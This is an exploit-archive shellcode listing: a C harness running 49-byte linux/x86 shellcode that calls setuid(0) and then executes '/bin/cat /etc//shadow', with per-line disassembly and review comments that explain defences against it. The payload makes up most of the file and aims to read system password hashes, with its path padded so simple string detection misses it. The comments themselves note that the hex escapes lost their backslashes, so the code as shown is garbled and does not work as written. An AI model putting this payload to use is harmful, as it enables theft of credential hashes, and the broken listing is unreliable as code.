# Title : Linux - setuid(0) and cat /etc/shadow
# Published : 2009-12-04
# Author : ka0x
#include <stdio.h>
/*
linux/x86 ; setuid(0) & execve(/bin/cat /etc/shadow) 49 bytes
written by ka0x - <ka0x01[alt+64]gmail.com>
lun sep 21 16:40:16 CEST 2009
greets: an0de, Piker, xarnuz, NullWave07, Pepelux, JosS, sch3m4, Trancek and others!
*/
/*
 * Test harness for the linux/x86 payload described in the file header
 * (49 bytes per that header): it prints the payload length and then calls the
 * byte array as if it were a function.
 *
 * Payload behaviour, read from the per-line disassembly below:
 *   1. setuid(0)   - syscall 0x17 with ebx = 0; the result is never checked.
 *   2. execve("/bin/cat", {"/bin/cat", "/etc//shadow", NULL}, NULL)
 *                  - syscall 0x0b, with edx = 0 used as the NULL envp.
 *
 * NOTE(review): as shown on this page the string literals carry no hex-escape
 * backslashes, so C reads each one as plain ASCII text ('x', '3', '1', ...)
 * and not as the opcodes named in the comments; sizeof(shellcode)-1 is then
 * not 49 either. This looks like extraction damage to the listing.
 *
 * Points a defender can take from the listing:
 *   - setuid(0) changes nothing unless the process already holds root in one
 *     of its uids (or the matching capability). A set-uid-root program that
 *     only lowered its effective uid is the case where the call regains
 *     root; dropping real, effective and saved uid together closes that path.
 *   - shellcode[] is a local array, so the call below targets stack memory.
 *     With a non-executable stack the call faults instead of running it.
 *   - The path is assembled as "/etc//shadow" (12 bytes, three dword pushes;
 *     the doubled slash presumably pads the 11-byte path). Detection that
 *     string-matches "/etc/shadow" in execve arguments does not match this
 *     form; normalise paths first or watch access to the file itself.
 */
int main()
{
char shellcode[] =
"x31xdb" // xor ebx,ebx          ; ebx = 0, the uid argument
"x6ax17" // push byte 17h        ; 0x17 = setuid syscall number
"x58" // pop eax                 ; eax = 0x17
"xcdx80" // int 0x80             ; setuid(0), result ignored
"x8dx43x0b" // lea eax,[ebx+0xb] ; eax = 0x0b (execve); relies on ebx still 0
"x99" // cdq                     ; edx = 0 (sign extension of eax)
"x52" // push edx                ; NUL terminator for the first string
"x68x2fx63x61x74" // push dword 0x7461632f ; "/cat"
"x68x2fx62x69x6e" // push dword 0x6e69622f ; "/bin" -> "/bin/cat" at esp
"x89xe3" // mov ebx,esp          ; ebx = program path, also argv[0]
"x52" // push edx                ; NUL terminator for the second string
"x68x61x64x6fx77" // push dword 0x776f6461 ; "adow"
"x68x2fx2fx73x68" // push dword 0x68732f2f ; "//sh"
"x68x2fx65x74x63" // push dword 0x6374652f ; "/etc" -> "/etc//shadow" at esp
"x89xe1" // mov ecx,esp          ; ecx = address of the file argument
"x52" // push edx                ; argv[2] = NULL
"x51" // push ecx                ; argv[1] = "/etc//shadow"
"x53" // push ebx                ; argv[0] = "/bin/cat"
"x89xe1" // mov ecx,esp          ; ecx = argv
"xcdx80" ; // int 80h            ; execve(ebx, ecx, edx)
// NOTE(review): sizeof yields a size_t but the format uses %d, a mismatched
// specifier; %zu is the matching one. The trailing "nn" is probably "\n\n"
// with its backslashes lost; as written it prints the letters "nn".
printf("[*] ShellCode size (bytes): %dnn", sizeof(shellcode)-1 );
// Casts the array to a pointer to a void function and calls it. Converting an
// object pointer to a function pointer is not portable C. The listing ends on
// the second int 0x80 with no ret, so control is not expected to come back
// here in an orderly way even if execve fails.
(*(void(*)()) shellcode)();
return 0;
}